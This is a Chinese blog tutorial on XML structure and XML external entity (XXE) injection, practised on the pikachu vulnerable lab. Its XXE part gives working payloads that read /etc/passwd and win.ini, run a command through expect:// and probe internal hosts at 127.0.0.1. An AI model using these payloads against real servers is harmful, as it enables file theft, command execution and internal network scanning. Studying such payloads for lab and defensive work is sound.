初探XML外部实体注入漏洞

最新推荐文章于 2024-04-14 14:03:30 发布
最新推荐文章于 2024-04-14 14:03:30 发布
阅读量119 收藏
点赞数
文章标签: xml java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55641973/article/details/131147090
版权

   

XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。

XML和HTML对比
1、XML主要用来描述数据
2、HTML主要用来显示数据

XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素 。

所有的 XML 文档(以及 HTML 文档)均由以下简单的构建模块构成:

元素:

        元素指的就是XML中的标记,这种标记也被称为标签、节点。

        主要: XML标签大小敏感,根元素有且只有一个,成对出现。

属性:

        属性可提供有关元素的额外信息 。

        <元素名 属性名="属性值" 属性名='属性值'>        <img src="computer.gif" />

实体:

        实体是用来定义普通文本的变量实体引用是对实体的引用。

预定义实体:

实体       描述
&quot;双引号
&apos;单引号
&lt;小于,即<
&gt;大于,即>
&amp;&

自定义实体:

<!DOCTYPE 根元素名称[
	<!ENTITY 实体名 实体内容>
]>

                  自定义一般实体:            

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE book SYSTEM "demo8.dtd"[
	<!ENTITY bj "北京大学出版社">
]>
<book>
	<detail>
		<name>XML</name>
		<author>李白</author>
		<publisher>&bj;</publisher>
		<price>22.5</price>
		<url>
			<![CDATA[
				<a href="#">链接1</a>
			]]>
		</url>
	</detail>
	<detail>
		<name>PHP</name>
		<author>杜甫</author>
		<publisher>&bj;</publisher>
		<price>22.5</price>
		<url>
			<![CDATA[
				<a href="#">链接2</a>
			]]>
		</url>
	</detail>

                    自定义参数实体:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE roster  SYSTEM "demo11.dtd"[
	<!ENTITY % p "teacher">  <!-- 给参数赋值 -->
]>
<roster>
	<teacher id="s">
		<name></name>
		<sex></sex>
		<birthday></birthday>
		<skill></skill>
	</teacher>
</roster>

DTD(Document Type Definition,文档类型定义)

用来为 XML 文档定义语法约束,可以是内部申明也可以使引用外部DTD现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从而也就直接避免了这个漏洞。

PCDATA:

        是被解析的字符数据(parsed character data)。

        PCDATA 是会被解析器解析的文本。

        这些文本将被解析器检查实体以及标记。

        <age>zhoujielun age > chenguanxi age</age>

CDATA:

        是字符数据(character data)。

        CDATA 是不会被解析器解析的文本。

回归正题:

xml外部实体注入

XML解析依赖库libxml默认开启了对外部实体的引用(libxml<2.9 默认开启),导致服务端在解析用户提交的XML信息时未作处理直接进行解析,导致加载恶意的外部文件和代码,造成任意文件读取,命令执行、内网扫描等危害。 

pikachu靶场复现

GitHub - zhuifengshaonianhanlu/pikachu: 一个好玩的Web安全-漏洞测试平台

任意文件读取

libxml2

file、http、ftp

PHP

file、http、ftp、php、glob、data...

JAVA

file、http、ftp、https、jar、gopher...

.NET

file、http、ftp、https

判断是否存在漏洞:

<?xml version="1.0"?> 
<!DOCTYPE ANY [    
<!ENTITY exist "存在漏洞" > ]> 
<a>&exist;</a>

漏洞构造方式:

1.外部实体声明,外部实体声明+外部DTD文件:

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE a [  
<!ENTITY b SYSTEM "file:///c:/windows/win.ini"> ]> 
<a>&b;</a>

读取一些敏感目录,windows读取c:/windows/win.ini,linux读取 /etc/passwd

(file://协议只能用绝对路径)

<?xml version="1.0"?>
<!DOCTYPE a SYSTEM "http://127.0.0.1/test.dtd">
<c>&b;</c>

<!ENTITY b SYSTEM "file:///etc/passwd">

命令注入:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "expect://cat /" >]>
<root>
<name>&xxe;</name>
</root>

内网探测,攻击:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "http://127.0.0.1:80/payload" >]>
<root>
<name>&xxe;</name>
</root>
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "http://127.0.0.1:80" >]>
<root>
<name>&xxe;</name>
</root>

后续继续学习XEE......

 

神仙鱼~
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
服务端安全之XML外部实体注入(XXE)
好记性不如烂笔头
10-14 917
1. 什么是XXE? XXE是XML external entity (XXE) injection 2. XXE是怎么发生的? XML规范中包含了一些不安全的特性,如果XML parser实现了这些特性,就存在安全隐患。XML external entity是一种自定义XML实体,其定义的值是从声明它们的DTD外部加载的。从安全性的角度来看,外部实体会存在潜在风险,因为它们允许根据文件路径或URL的内容定义实体。 3. XXE攻击的种类 3.1 利用XXE读取文件内容 为了实现这种攻击,有两种方式: (
网络安全初探SQL注入漏洞
07-02
利用PHP和mysql搭建了一个简易网站,包括网页登录、注册和主页,目的为练习SQL漏洞注入,故网页设计较为简单,仅实现基本前端表单和PHP数据交互功能。
Xml实体注入漏洞姿势总结
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
03-08 5294
Xml实体注入漏洞姿势总结
XXE-XML外部实体注入 漏洞详解
最新发布
m0_69043895的博客
04-14 1104
XML指可扩展标记语言(Extensible Markup Language)。XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。它在 HTML 之后开发,来弥补 HTML的不足。HTML 用于定义数据的展示,专注于它应该是什么样子。反之,XML 用于定义数据如何被组织。例如,HTML中,你的标签为<title>、<h1>、<tab1e>,<p>以及其它标签。
XML外部实体注入漏洞——XXE简单分析
未完成的歌~的博客
02-01 1188
前言: 前几天做了南邮 NJUPT CTF的几道题,感觉自己要学的的东西还有太多!今天借着比赛中的一道Web题 来系统的学习下XML外部实体注入(XML External Entity Injection) 题目:Fake XML cookbook 题目:Fake XML cookbook 平台暂时还未关闭,想要复现的抓紧了! 网址:https://nctf.x1c.club/challenges#Web ...
XML实体注入漏洞
zhangge3663的博客
02-11 677
XML实体注入漏洞 测试代码1:新建xmlget.php,复制下面代码 <?php $xml=$_GET['xml']; $data=simplexml_load_string($xml); print_r($data); ?> 漏洞测试利用方式1:有回显,直接读取文件 <?xml version="1.0" encoding="utf-8"?> <!DO...
学习记录--Day18(xml实体注入漏洞
veinard_F的博客
10-24 227
XML相关学习 XXE漏洞xml外部实体注入漏洞,该漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发点一般是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。 xml: xml被设计为传输和存储数据,关注的主要是数据的内容,而html被设计用来显示数据,也就是数据的外观;xml把数据从html分离,是独立于软件和硬件的信息传输工具。 基本语法:
DataSet&XML初探
02-27
在探讨DataSet和XML之前,我们首先对ADO.NET进行初步的了解。可以说ADO.NET是各种各样数据访问技术中最新的一种,它已经成为构建.Net数据库应用程序的基础,尽管如此,ADO.NET并不是完全以数据库为核心的,它集成XML...
初探PHP的SQL注入攻击的技术实现以及预防措施
02-26
SQL攻击(SQLinjection,台湾称作SQL资料隐码攻击),简称注入攻击,是发生于应用程序之数据库层的安全漏洞。简而言之,是在输入的字符串之中注入SQL指令,在设计不良的程序当中忽略了检查,那么这些注入进去的指令...
web漏洞-xml外部实体注入(XXE)
rumil的博客
10-09 2054
XXE漏洞全称XML External Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题",也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入
XML外部实体注入——XXE漏洞详解
Gefangenes的博客
07-02 2033
首先要了解什么是XXE漏洞,首先应该了解一下什么是XMLXML(可扩展标记语言,英文全称:eXtensible Markup Language)是一种用于描述数据结构和交换数据的标记语言XML是一种非常灵活的语言,可以用于描述各种类型的数据,如文档、图像、音频、视频等。这个解释太官方,我们可以将xml语言和html对比着再来解释一下1>xml仅仅是纯文本,他不会做任何事情2>xml可以自己发明标签(允许定义自己的标签和文档结构)3>专门用来存放传输数据的东西。
xml注入漏洞
weixin_45095113的博客
10-28 4783
xml注入
【网络安全】web漏洞-xml外部实体注入(XXE)
A1_3_9_7的博客
12-28 1039
xml可拓展标记语言xml是一种可拓展的标记语言,可以用来存储数据,例如:我们经常看到一些.xml的文件;它还可以用来传输数据,我们可以直接将数据以xml的格式放在请求当中,发给服务器。XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。
漏洞总结——XXE(XML外部实体注入
Spontaneous_0的博客
09-08 426
XXE漏洞全称为 XML External Entity Injection,即XML外部实体注入XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载, 导致用户可以控制外部的加载文件,造成XXE漏洞
XXE(XML外部实体注入)漏洞分析——pikachu靶场复现
qq_45612828的博客
08-02 6425
XXE(XML外部实体注入)漏洞分析——pikachu靶场复现
[实践总结] java XML解析防止外部实体注入
张紫娃的博客
01-06 690
【代码】[实践总结] java XML解析防止外部实体注入
java xml内容的引用,Java XML解析:避免实体引用解析
weixin_28716217的博客
03-02 108
I am currently parsing XHTML documents with a DOM parser, like:final DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();dbf.setValidating(false);final DocumentBuilder db = dbf.newDocume...
Educoder Python初探
09-21
Educoder Python初探是一个学习Python编程语言的课程。其中包含了多个编程示例,例如字符串查找与替换、用数字说话和字符转换。在字符串查找与替换示例中,我们首先使用find函数查找字符串中的特定子串,并返回其...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值